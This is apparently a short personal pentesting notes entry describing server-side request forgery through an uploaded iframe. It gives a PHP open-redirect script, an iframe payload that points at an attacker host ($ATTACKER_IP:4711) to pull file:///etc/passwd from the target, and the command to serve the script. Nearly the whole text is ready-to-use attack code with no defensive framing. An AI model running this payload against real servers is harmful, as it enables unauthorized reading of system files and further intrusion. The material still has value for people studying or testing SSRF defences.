The Real Hugo
Husk

SSRF through iframe

  • taken from Jomar's Website
  • Upload iframe with attacker server and php code ready to be executed. Redirect to a local file on the server
<?php
$loc = "http://127.0.0.1/";

if(isset($_GET['a'])){
    $loc = $_GET['a'];
}
header('Location: '.$loc);
?>
  • Payload looks like this
<iframe src="http://$ATTACKER_IP:4711/ssrf.php?a=file:///etc/passwd"/>
  • Start a php adhoc server and run it
php -S 0.0.0.0:4711